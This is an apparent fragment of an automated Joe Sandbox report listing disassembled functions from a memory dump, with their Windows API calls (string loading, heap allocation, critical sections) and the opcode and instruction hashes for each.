                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateErrorHandleLastTime
                                                        • String ID:
                                                        • API String ID: 2291555494-0
                                                        • Opcode ID: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                                                        • Instruction ID: 64467d0e5ceda328e6e32eae128236dd02d513a4ef1926b956b8d25c0d97de23
                                                        • Opcode Fuzzy Hash: ff746e65f9cee30ffc8bafec341a8eb05b102094c88bf525f6141f2248b114e2
                                                        • Instruction Fuzzy Hash: B4F0E2762803507BE2302B60AC48F9B6E5CDBC9B25F108535B2A5A20E0C2294D1992B8
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID: $
                                                        • API String ID: 3519838083-227171996
                                                        • Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                                                        • Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
                                                        • Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                                                        • Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00403D5F
                                                          • Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID: > @$KA
                                                        • API String ID: 3519838083-301980584
                                                        • Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                                                        • Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
                                                        • Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                                                        • Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89
                                                        APIs
                                                        • GetCPInfo.KERNEL32(?,00000000), ref: 004180A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: Info
                                                        • String ID: $
                                                        • API String ID: 1807457897-3032137957
                                                        • Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                                                        • Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
                                                        • Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                                                        • Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00405F63
                                                        • LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prologLoadString
                                                        • String ID: KA
                                                        • API String ID: 385046869-4133974868
                                                        • Opcode ID: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                                                        • Instruction ID: f8b33de4bb70f64bdff40eb498b0250b344fd9cf2a6d880d3b442eae3703c9f6
                                                        • Opcode Fuzzy Hash: e6db0625694eca8672df4367e77b25990e3c0bbb9f4bdb8bdb41469bebcffd79
                                                        • Instruction Fuzzy Hash: B8212771D0011A9BCB05EFA1C9919EEBBB5FF08308F10407AE106B6291DB794E40CB98
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00405EC1
                                                        • LoadStringA.USER32(KA,?,?,00000000), ref: 00405F12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: H_prologLoadString
                                                        • String ID: KA
                                                        • API String ID: 385046869-4133974868
                                                        • Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                                                        • Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
                                                        • Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                                                        • Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4
                                                        APIs
                                                        • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
                                                        • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
                                                        • HeapFree.KERNEL32(00000000,?), ref: 00416187
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 3499195154-0
                                                        • Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                                                        • Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
                                                        • Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                                                        • Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48
                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
                                                        • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
                                                        • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
                                                        • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706
                                                        Memory Dump Source
                                                        • Source File: 00000012.00000002.2552649674.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000012.00000002.2546053594.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558280743.000000000041B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558618107.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558665817.0000000000422000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558720118.0000000000423000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 00000012.00000002.2558772065.0000000000427000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_18_2_400000_iYU7jmLL0jPLxgjctxjq1ReZ.jbxd
                                                        Similarity
                                                        • API ID: CriticalInitializeSection
                                                        • String ID:
                                                        • API String ID: 32694325-0
                                                        • Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                                                        • Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
                                                        • Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                                                        • Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8